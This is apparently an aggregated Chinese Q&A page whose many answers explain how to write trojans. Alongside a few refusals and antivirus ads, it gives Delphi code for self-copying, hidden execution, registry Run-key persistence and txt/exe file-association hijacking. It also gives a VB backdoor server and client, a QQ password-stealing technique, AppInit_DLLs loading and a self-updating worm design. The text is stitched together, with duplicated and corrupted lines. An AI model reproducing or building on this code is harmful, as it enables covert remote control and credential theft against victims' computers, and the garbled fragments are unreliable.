❶ 如何編寫木馬程序
怎樣編寫木馬程序
您好
建議您不要去學習使用木馬病毒,是屬於違法犯罪行為。而且,如果您接收了木馬病毒,那麼該病毒會自動在您的電腦中優先運行。
建議您到騰訊電腦管家官網下載一個電腦管家。
在平時使用電腦的時候,打開電腦管家,可以受到電腦管家16層實時防護的保護和雲智能預警系統,可以在木馬活動早期偵測並阻斷木馬的破壞行為,通過雲查殺技術秒殺最新流行木馬。
如果還有其他疑問和問題,歡迎再次來電腦管家企業平台進行提問,我們將盡全力為您解答疑難
騰訊電腦管家企業平台:./c/guanjia/
如何編寫木馬程序??
你想干什麼?如果你只想玩玩,建議你學一下vbs腳本或bat腳本,如果你想把腳本做成exe程序,最簡單的方法就是把腳本壓縮到自解壓文件里,再用16進制編輯器修改一下某個數值,就成功了。
如果你想干壞事,嘻嘻,木馬也不是那麼好寫的,首先你要成為一個出色的程序員,不僅要打好C語言基礎,更要精通匯編語言和計算機硬體以及操作系統原理,邏輯思維要強,當然要學的還很多,如mfc,C#等等,所以,如果你不是非常痴迷於編程,我勸你玩玩就行了,當然,更不要走上違法犯罪的道路吆!
good luck。
呀,還有,請採納我吧,寶貝兒,嘻!
如何編寫木馬程序
如果對電腦感興趣的話可以學習下,一般軟體開發工程師都是學的高級語言,但是如果寫木馬,我們一般是要接觸低級語言的,低級語言比高級語言學起來枯燥,但學成之後進階高級語言很快而且比一般的程序員牛逼,高級語言配合底層知識才能寫出更好的木馬。底層知識越牢固越好。
怎樣才能編程木馬程序
北上廣深這么多程序員,怎麼沒幾個搞這種編程的?
一個原因就是沒錢賺,另一個原因就是技術上要求太高。
好好的學編程,從你提這個問題來看,你都還沒入門吧。
慢慢學,你會發現學得越多自己越無知,等你有五年以上開發經驗的時候,再來看你現在的這個提問的時候,一定會笑話這個時候的自己的。
祝你在開發的路上快速成長!
木馬是如何編寫的(三)
很高興為您解答:
木馬編寫是需要你懂的C++語言
首先是程序的大小問題,本程序經編譯鏈接後得到的可執行文件竟有400多K,用Aspack1.07壓了一下也還有200多K。可以看出不必要的Form是應該去掉的;並且盡量由自己調用底層的API函數,而盡量少使用Borland打好包的VCL控制項;要盡量使用匯編語言(BCB支持C++和匯編混編),不但速度會加快,而且大小可以小很多,畢竟木馬是越小越好。
還有啟動方式的選擇。出了Win.ini、System.ini之外,也還是那幾個注冊表鍵值,如:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\
RunServices
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
都已被其他的木馬用爛了。現在又開始對exe、dll和txt文件的關聯程序動手腳了(如冰河和廣外女生)。這里涉及到參數傳遞的問題。得到ParamStr()函數傳來的參數,啟動自己後再啟動與之關聯的程序,並將參數傳遞給它,這樣就完成了一次「雙啟動」,而受害者絲毫感覺不到有任何異常。具體鍵值如:
與exe文件建立關聯:HKEY_CLASSES_ROOT\exefile\shell\open\mand
與txt文件建立關聯:HKEY_CLASSES_ROOT\txtfile\shell\open\mand
與dll文件建立關聯:HKEY_CLASSES_ROOT\dllfile\shell\open\mand
等,當然還可以自己擴充。目前還有一種新方法:在
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
\Windows
下添加如下鍵值 "AppInit_DLLs"="Server.dll",這就把Server.dll注冊為系統啟動時必須載入的模塊(你應該把木馬編譯成DLL)。下次開機時,木馬以動態鏈接庫形式被載入,存在於系統進程中。因為沒有它自己的PID(Process ID 進程識別號),所以在NT的任務管理器中也看不見(不過在「系統信息」——「軟體環境」——「已載入的32位模塊」中還是可以詳細看到當前內存中載入的每一個模塊的),這樣做的目的是可以使自己的程序更加隱蔽,提高木馬的生存能力。
木馬的功能還可以大大擴充。你可以充分發揮你的想像力——比如上傳、下載、新建、改名、移動文件,截圖存為jpg文件傳回,錄音監聽成Wav文件,錄像成AVI文件,彈光碟機,讀軟碟機,關機,重啟,不停地掛起,胡亂切換解析度(燒掉你的顯示器),發對話框,不停地打開資源管理器直到死機,殺掉Kernel32.dll進程使機器暴死,交換滑鼠左右鍵,固定滑鼠,限制滑鼠活動范圍,滑鼠不聽指揮到處亂竄,記錄擊鍵記錄(記錄上網口令,這需要深入了解鉤子(Hook)技術,如鍵盤鉤子和滑鼠鉤子),竊取......
編寫木馬?
盜號木馬~~~~樓主,這不是好玩的東西,不過看在高分懸賞的份上,就告訴你吧。 可以通過 SendMessage 發送 WM_GETTEXT 取得密碼框中的值,我們可以利用這一點來完成密碼的截取。 使用 Timer 控制項,監視QQ。 用遍查窗口的方法(EnumWindows),取得所有的窗口標題(GetWindowText),判斷其中是否為"QQ用戶登錄"的標題,取 得QQ登錄窗口的子窗口(窗口上的控制項)的類名(GetClassName),然後通過 boBox、Edit 取得用戶名和密碼(通過 SendMessage 發送 WM_GETTEXT 取得值)。 由於不能判斷外部按鍵事件的發生,只有通過不斷的取得密碼值,具體方法如下: 首先取得 用戶名的值,然後不停的取密碼的值,再判斷窗口的標題是否為用戶名,如果為用戶名,則最後一次密碼的值就是真正的密碼,到此程序完成。 程序編制 (1)首先為了避免程序被多次裝載,造成系統資源的浪費、及不必要的錯誤。 聲明變數、過程及 API 函數,寫在 Mole1.bas 文件中 Declare Function CreateFileMapping Lib "kernel32" Alias "CreateFileMappingA" (ByVal hFile As Long, lpFileMappigAttributes As SECURITY_ATTRIBUTES, ByVal flProtect As Long, ByVal dwMaximumSizeHigh As Long, ByVal dwMaximumSizeLow As Long, ByVal lpName As String) As Long '創建一個新的文件映射對象
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long '關閉一個內核對象
Type SECURITY_ATTRIBUTES
nLength As Long
lpSecurityDescriptor As Long
bInheritHandle As Long
End Type
Const PAGE_READWRITE = 1
Const ERROR_ALREADY_EXISTS = 183&
建立判斷程序是否多啟動的過程
Sub Main()
Dim ynRun As Long
Dim sa As SECURITY_ATTRIBUTES
sa.bInheritHandle = 1
sa.lpSecurityDescriptor = 0
sa.nLength = Len(sa)
ynRun = CreateFileMapping(&HFFFFFFFF, sa, PAGE_READWRITE, 0, 128, App.title) '創建內存映射文件
If (Err.LastDllError = ERROR_ALREADY_EXISTS) Then '如果指定內存文件已存在,則退出
CloseHandle ynRun '退出程序前關閉內存映射文件
End
End If
End Sub
(2)即時監視,就需要在系統啟動時,程序自啟動,這里使用修改注冊表的方法 聲明變數、過程及 API......
木馬程序是怎麼編出來的
一個典型的蠕蟲病毒有兩個功能型部件:傳播和破壞,流行的蠕蟲病毒大都是利用操作系統或者應用程序的漏洞(以弱口令和溢出最為常見),但常常並不會對宿主機造成「致命」的破壞。這兩個特點使蠕蟲病毒比普通電腦病毒傳播得更快,影響力更大。一般來說,單一的蠕蟲病毒只針對某種特定的漏洞進行攻擊,所以一旦這種漏洞得到大范圍修補,病毒也就沒有了生存空間。
更新這種設計,我把傳播部件拆分開來:把掃描、攻擊和破壞腳本化,主程序則負責解析這些腳本。例如針對ftp弱口令進行掃描,我們可以定義如下腳本:
code:
uid = iscript-0a21-2331-x #隨機唯一編號
using tcp;
port 21;
send 「user anonymous」;
send crlf;
send 「pass [email protected]」
send crlf;
if (find 「200」) resulrt ok;
next;
[ to clipboard]
解析了這段腳本後(我想這種腳本是很容易讀懂的),我們再定義一系列的過程,把我們的蠕蟲體upload上去,一次完整的傳播動作就完成了。如果是溢出漏洞,為了簡單起見我們可以採集遠程溢出的數據包,然後修改ip地址等必要數據,再轉發溢出數據包進行溢出(這種情況下要實現connect-back就不容易了,不過這些具體問題就待有心人去研究吧),例如:
code:
using raw;
ip offset at 12;
send 「\x1a\xb2\xcc」 ……
[ to clipboard]d
主程序在完成傳播後留下一個後門,其他宿主機可以通過這個後門與本地的蠕蟲病毒同步傳播腳本,這樣每次有新的漏洞產生,宿主機的傳播方式可以很快地得到升級。我們當然不會僅滿足於這樣一個蠕蟲程序,掃描/攻擊腳本的傳播過程也是需要仔細處理的。
我們希望適應力(fitness)最強的腳本得到廣泛的應用(看起來有點類似 蟻群演算法 和 ga),所以我們要求得每個個體的fitness,當它和另一個體取得聯系的時候就可以決定誰的傳播腳本將取代另一個:
fitness = number of host infected / number of host scanned
但也不能僅憑fitness就修改傳播腳本,我個人覺得一個合適的概率是75%,20%的機會保持各自的傳播腳本,剩下的5%則交換腳本。這樣在維持每種腳本都有一定生存空間的情況下使適應性最好的個體得到更多的傳播機會,同時,一些在某種網路環境下適應性不強的腳本也有機會嘗試不同的網路環境。
木馬程序是怎麼寫出來的?
您好:
建議您不要編寫木馬程序,木馬程序會對您和別人的電腦造成損害的,如果您曾編寫過此類不安全的軟體的話,為了您電腦的安全,建議您使用騰訊電腦管家對您的電腦進行一下全面的殺毒吧,打開騰訊電腦管家中的殺毒功能選擇閃電查殺或者全盤查殺就可以,您可以點擊這里下載最新版的騰訊電腦管家:最新版騰訊電腦管家下載
騰訊電腦管家企業平台:./c/guanjia/
怎麼製作木馬程序?
你需要學會編程才能編寫木馬編寫木馬最好用vc++。enet/eschool/video/c++/ 這是c++的教程,你學懂了這些皮毛的東西再深入研究內核編程吧如果上面的地址打不開可以到這里pconline/pce/empolder/gj/vc/0607/820674
怎麼編寫一個簡單的木馬程序?
特洛依木馬這個名詞大家應該不陌生,自從98年「死牛崇拜」黑客小組公布Back Orifice以來,木馬猶如平地上的驚雷, 使在Dos——Windows時代中長大的中國網民從五彩繽紛的網路之夢中驚醒,終於認識到的網路也有它邪惡的一面,一時間人心惶惶。
我那時在《電腦報》上看到一篇文章,大意是一個菜鳥被人用BO控制了,嚇得整天吃不下飯、睡不著覺、上不了網,到處求救!要知道,木馬(Trojan)的歷史是很悠久的:早在AT&T Unix和BSD Unix十分盛行的年代,木馬是由一些玩程式(主要是C)水平很高的年輕人(主要是老美)用C或Shell語言編寫的,基本是用來竊取登陸主機的口令,以取得更高的許可權。那時木馬的主要方法是誘騙——先修改你的.profile文件,植入木馬;當你登陸時將你敲入的口令字元存入一個文件,用Email的形式發到攻擊者的郵箱里。國內的年輕人大都是在盜版Dos的薰陶下長大的,對網路可以說很陌生。直到Win9x橫空出世,尤其是WinNt的普及,大大推動了網路事業的發展的時候,BO這個用三年後的眼光看起來有點簡單甚至可以說是簡陋的木馬(甚至在Win9x的「關閉程序」對話框可以看到進程)給了當時中國人極大的震撼,它在中國的網路安全方面可以說是一個劃時代的軟體。
自己編寫木馬,聽起來很Cool是不是?!木馬一定是由兩部分組成——伺服器程序(Server)和客戶端程序(Client),伺服器負責打開攻擊的道路,就像一個內奸特務;客戶端負責攻擊目標,兩者需要一定的網路協議來進行通訊(一般是TCP/IP協議)。為了讓大家更好的了解木馬攻擊技術,破除木馬的神秘感,我就來粗略講一講編寫木馬的技術並順便編寫一個例子木馬,使大家能更好地防範和查殺各種已知和未知的木馬。
首先是編程工具的選擇。目前流行的開發工具有C++Builder、VC、VB和Delphi,這里我們選用C++Builder(以下簡稱BCB);VC雖然好,但GUI設計太復雜,為了更好地突出我的例子,集中注意力在木馬的基本原理上,我們選用可視化的BCB;Delphi也不錯,但缺陷是不能繼承已有的資源(如「死牛崇拜」黑客小組公布的BO2000源代碼,是VC編寫的,網上俯拾皆是);VB嘛,談都不談——難道你還給受害者傳一個1兆多的動態鏈接庫——Msvbvm60.dll嗎?
啟動C++Builder 5.0企業版,新建一個工程,添加三個VCL控制項:一個是Internet頁中的Server Socket,另兩個是Fastnet頁中的NMFTP和NMSMTP。Server Socket的功能是用來使本程序變成一個伺服器程序,可以對外服務(對攻擊者敞開大門)。Socket最初是在Unix上出現的,後來微軟將它引入了Windows中(包括Win98和WinNt);後兩個控制項的作用是用來使程序具有FTP(File Transfer Protocol文件傳輸協議)和SMTP(Simple Mail Transfer Protocol簡單郵件傳輸協議)功能,大家一看都知道是使軟體具有上傳下載功能和發郵件功能的控制項。
Form窗體是可視的,這當然是不可思議的。不光佔去了大量的空間(光一個Form就有300K之大),而且使軟體可見,根本沒什麼作用。因此實際寫木馬時可以用一些技巧使程序不包含Form,就像Delphi用過程實現的小程序一般只有17K左右那樣。
我們首先應該讓我們的程序能夠隱身。雙擊Form,首先在FormCreate事件中添加可使木馬在Win9x的「關閉程序」對話框中隱藏的......
❷ 怎樣編寫木馬程序我不用,只想知道
看看這個,是用VB編的木馬程序
1.「特洛伊木馬」有被稱為BO, 是在美國一次黑客技術討論會上由一個黑客組織推出的。它其實是一種客戶機/伺服器程序,其利用的原理就是:在本機直接啟動運行的程序擁有與使用者相同的許可權。因此如果能夠啟動伺服器端(即被攻擊的計算機)的伺服器程序,就可以使用相應的客戶端工具客戶程序直接控制它了。下面來談談如何用VB來實現它。
使用VB建立兩個程序,一個為客戶端程序Client,一個為伺服器端程序systry。
在Client工程中建立一個窗體,載入WinSock控制項,稱為tcpClient,協議選擇TCP,再加入兩個文本框,用以輸入伺服器的IP地址或伺服器名,然後建立一個按鈕,按下之後就可以對連接進行初始化了,代碼如下:
Private Sub cmdConnect_Click()
If Len(Text1.Text) = 0 And Len(Text2.Text) = 0 Then
MsgBox ("請輸入主機名或主機IP地址。")
Exit Sub
Else
If Len(Text1.Text) > 0 Then
tcpClient.RemoteHost = Text1.Text
Else
tcpClient.RemoteHost = Text2.Text
End If
End If
tcpClient.Connect
Timer1.Enabled = True
End Sub
連接建立之後就可以使用DataArrival事件處理所收到的數據了。
連接建立之後就可以使用DataArrival事件處理所收到的數據了。
在伺服器端systry工程也建立一個窗體,載入WinSock控制項,稱為tcpServer,協議選擇TCP,在Form_Load事件中加入如下代碼:
Private Sub Form_Load()
tcpServer.LocalPort = 1999
tcpServer.Listen
End Sub
准備應答客戶端程序的請求連接,使用ConnectionRequest事件來應答戶端程序的請求,代碼如下:
Private Sub tcpServer_ConnectionRequest
(ByVal requestID As Long)
If tcpServer.State < > sckClosed Then
tcpServer.Close『檢查控制項的 State 屬性是否為關閉的。
End If 』如果不是,在接受新的連接之前先關閉此連接。
tcpServer.Accept requestID
End Sub
這樣在客戶端程序按下了連接按鈕後,伺服器端程序的ConnectionRequest事件被觸發,執行了以上的代碼。如果不出意外,連接就被建立起來了。
2. 建立連接後伺服器端的程序通過DataArrival事件接收客戶機端程序所發的指令運行既定的程序。如:把伺服器端的驅動器名、目錄名、文件名等傳到客戶機端,客戶機端接收後用TreeView控制項以樹狀的形式顯示出來,瀏覽伺服器端文件目錄;強制關閉或重啟伺服器端的計算機;屏蔽任務欄窗口;屏蔽開始菜單;按照客戶機端傳過來的文件名或目錄名,而刪除它;屏蔽熱啟動鍵;運行伺服器端的任何程序;還包括獲取目標計算機屏幕圖象、窗口及進程列表;激活、終止遠端進程;打開、關閉、移動遠端窗口;控制目標計算機滑鼠的移動與動作;交換遠端滑鼠的左右鍵;在目標計算機模擬鍵盤輸入,下載、上裝文件;提取、創建、修改目標計算機系統注冊表關鍵字;在遠端屏幕上顯示消息。DataArrival事件程序如下:
Private Sub tcpServer_DataArrival
(ByVal bytesTotal As Long)
Dim strData As String
Dim i As Long
Dim mKey As String
tcpServer.GetData strData
『接收數據並存入strData
For i = 1 To Len(strData)
『分離strData中的命令
If Mid(strData, i, 1) = "@" Then
mKey = Left(strData, i - 1)
『把命令ID號存入mKey
『把命令參數存入strData
strData = Right(strData, Len(strData) - i)
Exit For
End If
Next i
Select Case Val(mKey)
Case 1
『驅動器名、目錄名、文件名
Case 2
強制關閉伺服器端的計算機
Case 3
強制重啟伺服器端的計算機
Case 4
屏蔽任務欄窗口;
Case 5
屏蔽開始菜單;
Case 6
按照客戶機端傳過來的文件名或目錄名,而刪除它;
Case 7
屏蔽熱啟動鍵;
Case 8
運行伺服器端的任何程序
End Select
End Sub
詳細程序略。
客戶機端用tcpClient.SendData發命令。命令包括命令ID和命令參數,它們用符號「@」隔開。
另外,當客戶機端斷開與伺服器端的來接後,伺服器端應用tcpServer_Close事件,來繼續准備接收客戶機端的請求,其代碼如下:
Private Sub tcpServer_Close()
tcpServer.Close
tcpServer.Listen
End Sub
這就是一個最基本的特洛伊木馬程序,只要你的機器運行了伺服器端程序,那別人就可以在千里之外控制你的計算機。至於如何讓伺服器端程序運行就要發揮你的聰明才智了,在我的源程序中有一中方法,是修改系統注冊表的方法。
這就是一個最基本的特洛伊木馬程序,只要你的機器運行了伺服器端程序,那別人就可以在千里之外控制你的計算機。至於如何讓伺服器端程序運行就要發揮你的聰明才智了,在我的源程序中有一中方法,是修改系統注冊表的方法。
成功的特洛伊木馬程序要比這個復雜一些,還有程序的隱藏、自動復制、傳播等問題要解決。警告:千萬不要用BO程序破壞別人的系統。
❸ 怎麼編寫木馬程序請各位大哥大姐們指點一二,越詳細越好,小弟一點不懂編程哦!
其實做這個很簡單的,現在我感覺做木馬關鍵在於創意了 我電腦中收集過的一篇文章,給你參考一下 「冰河」啟示錄 前言:我經常在雜志和報刊上看到此類標題的文章,但大多是騙稿費的,沒有任何技術含量.於是一氣之下寫了這編東西.本人聲明如下:(一)本人對"冰河"及其作者沒有任何不滿,相反,作者肯幫助初學者的態度是我們每一個人都應該學習的.(二)本文的目的在於交流編程經驗,沒有任何其它不良企圖.(三)在一些領域,我們理應寧可自製力讓我們的預見力保持寂寞,也不要去做一個打開潘多拉盒子的先知。所以一些更厲害的方法我們現在不會提,以後也不會.--2000.8.3 (1) 「冰河」是有名的用C++Builder編寫的國產遠程管理軟體,其自我的功能保護很強,下面就以Delphi為例談一談它的原理,希望對大家有一些啟發. 一、程序安裝 此類程序一般會把自己隱藏起來運行,通常不外乎以下幾種方法:自我拷貝法、資源文件法、網頁方式安裝、類病毒捆綁法(如YAI).自我拷貝法適用於本身就一個文件,資源文件法可以同時安裝好幾個文件,網頁方式安裝要先向M$交錢換安全簽證,類病毒捆綁法利用了病毒的原理.本文只介紹自我拷貝法,其它方法請到我的個人主頁去看. http://lovejingtao.126.com 1:自我拷貝法 這種方法的原理是程序運行時先查看自己是不是在特定目錄下,如果是就繼續運行,如果不是就把自己拷貝到特定目錄下,然後運行新程序,再退出舊程序. 打開Delphi,新建一個工程,在窗口的Create事件中寫代碼: procere TForm1.FormCreate(Sender: TObject); var myname: string; begin myname := ExtractFilename(Application.Exename); //獲得文件名 if application.Exename <> GetWindir + myname then //如果文件不是在Windows\System\那麼.. begin file(pchar(application.Exename), pchar(GetWindir + myname), False);{將自己拷貝到Windows\System\下} Winexec(pchar(GetWindir + myname), sw_hide);//運行Windows\System\下的新文件 application.Terminate;//退出 end; end; 其中GetWinDir是自定義函數,起功能是找出Windows\System\的路徑. function GetWinDir: String; var Buf: array[0..MAX_PATH] of char; begin GetSystemDirectory(Buf, MAX_PATH); Result := Buf; if Result[Length(Result)]<>'\' then Result := Result + '\'; end; 另外,為了避免同時運行多個程序的副本(節約系統資源也),程序一般會弄成每次只能運行一個.這又有幾種方法. 一種方法是程序運行時先查找有沒有相同的運行了,如果有,就立刻退出程序. 修改dpr項目文件,修改begin和end之間的代碼如下: begin Application.Initialize; if FindWindow('TForm1','Form1')=0 then begin //當沒有找到Form1時執行下面代碼 Application.ShowMainForm:=False; //不顯示主窗口 Application.CreateForm(TForm1, Form1); Application.Run; end; end. 另一種方法是啟動時會先通過窗口名來確定是否已經在運行,如果是則關閉原先的再啟動。「冰河」就是用這種方法的。 這樣做的好處在於方便升級.它會自動用新版本覆蓋舊版本. 方法如下:修改dpr項目文件 uses Forms,windows,messages, Unit1 in 'Unit1.pas' {Form1}; 為了程序能在Windows每次啟動時自動運行,可以通過六種途徑來實現.「冰河」用注冊表的方式。 加入Registry單元,改寫上面的窗口Create事件,改寫後的程序如下: procere TForm1.FormCreate(Sender: TObject); const K = '\Software\Microsoft\Windows\CurrentVersion\RunServices'; var myname: string; begin {Write by Lovejingtao, http://Lovejingtao.126.com ,[email protected]} myname := ExtractFilename(Application.Exename); //獲得文件名 if application.Exename <> GetWindir + myname then //如果文件不是在Windows\System\那麼.. begin file(pchar(application.Exename), pchar(GetWindir + myname), False);{//將自己拷貝到Windows\System\下} Winexec(pchar(GetWindir + myname), sw_hide);//運行Windows\System\下的新文件 application.Terminate;//退出 end; with TRegistry.Create do try RootKey := HKEY_LOCAL_MACHINE; OpenKey( K, TRUE ); WriteString( 'syspler', application.ExeName ); finally free; end; end; 為了讓程序用ALT+DEL+CTRL看不見,在implementation後添加聲明: function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer; stdcall; external 'KERNEL32.DLL'; 再在上面的窗口Create事件加上一句:RegisterServiceProcess(GetCurrentProcessID, 1);//隱藏 啟示1:當我們中了「冰河」,如果被對方上了密碼而無法自己卸載時,可以先找出是什麼文件,然後自己配置一個沒有密碼的來運行,這樣它就會把原來有密碼的覆蓋掉,自己就可以輕松用它的卸載功能把它卸掉.如果你會編程,也可以自己寫一個"清除器"了,方法是先查找到窗口名,向它發送退出命令,再把它刪除即可. (2) 「冰河」的自我功能保護很強,它一般通過Txt或Exe文件關聯來達到自我恢復.所以有很多人明明把它殺掉了,但重新啟動時又會出現.下面舉以Txt文件關聯為例. 打開Delphi,新建一個工程,在窗口的Create事件中寫代碼: uses Registry procere TForm1.FormCreate(Sender: TObject); const Kkk = '\Software\Microsoft\Windows\CurrentVersion\RunServices'; const K = '\txtfile\shell\open\command'; var sFileName:string; begin //****************************************************** with TRegistry.Create do //寫注冊表,讓程序跟文本文件關聯 try RootKey := HKEY_CLASSES_ROOT; OpenKey( K, TRUE ); {Write by Lovejingtao, http://lovejingtao.126.com } WriteString( '', application.ExeName+' "%1" '); {Write by Lovejingtao,[email protected]} finally free; end; //******************************************************* with TRegistry.Create do //寫注冊表,每次啟動時自動運行 try RootKey := HKEY_LOCAL_MACHINE; OpenKey( Kkk, TRUE ); WriteString( 'myTray', application.ExeName ); finally free; end; //******************************************************** if FileExists(pchar(Getwindir+'Sysplay.exe'))=false then//如果文件已經刪除 begin file;//自定義拷貝資源文件過程 winexec(pchar(Getwindir+'Sysplay.exe'),sw_hide); end; //********************************************************** if ParamCount>0 then begin (* 有執行參數傳入 *) sFileName:=ParamStr(1); (* 取得參數內容 *) winexec(pchar('Notepad.exe '+sFileName),sw_show);(*用記事本打開*) //winexec(pchar( sFileName),sw_show); end; //******************************************************* application.Terminate;//退出 end; 如果要改為與Exe文件關聯,只要把"const K = '\txtfile\shell\open\command';"改為 "const K = '\exefile\shell\open\command';",把"winexec(pchar('Notepad.exe '+sFileName),sw_show);" 改為"winexec(pchar( sFileName),sw_show);"即可.當然,還要加入是否退出Windows而運行的Rundll32.dll, 否則會因為關聯Exe文件而退不出Windows. 啟示2:手工刪除「冰河」時,還要改掉它的保護功能,不能讓它恢復.如果是關聯了文本文件,先改注冊表讓它不能自動運行,重啟後不要打開文本文件,立刻進到其安裝目錄把它刪除.如果是關聯了Exe文件,那隻有回到Dos下刪.切記:一定要把兩個文件同時刪掉,否則你重啟後會發現文件又恢復了
❹ 怎麼編寫木馬
這個只是惡作劇程序,不是木馬。
其實很簡單嘛,只要終止explorer.exe進程就行了。
這都不需要編程,只要寫個批處理就行。
把:taskkill
/f
/im
Explorer.exe寫到一個文本文檔里,然後把那個文檔的後綴名由.txt改為.bat就行了。
❺ 怎麼用C語言編寫木馬、病毒等程序
C語言當然可以編寫病毒,事實上很多程序都是用C/C++編寫出來的。x0dx0a編程語言本身沒有「貴賤」之分,只用用好了,都是相當強的;區別在於主要適用范圍、編寫的難易程序、執行效率的高低、學習的難易程度,等等。x0dx0aC語言只是一種計算機程序的編寫格式規范,到至於可以編寫出來什麼樣的程序,還要看你所用的C語言編譯器,(比如TC,VC,LCC,GCC等,太多了)。x0dx0a如果有編寫windows程序,就不能用TC,它只能編寫DOS程序,而應該用VC,LCC,C++Builder等編譯工具)x0dx0a編寫出來的程序肯定要調用操作系統提供的功能,如編windows程序,就要調用Win32 API,Dos程序則調用的是DOS中斷,編程實際上就是對這些操作系統所提供功能的調用。x0dx0a現在的病毒很多都是用常用的編程工具編寫的,如VC++,delph,VC,Win32匯編等
❻ 木馬是如何編寫的
這個木馬只是個例子在模枋BO,
很簡單是灰鴿子類的遠程式控制制軟體! 編寫思路上一段就是隱藏自己,當有客戶端連接時告訴以方你控制的機器是什麼操作系統!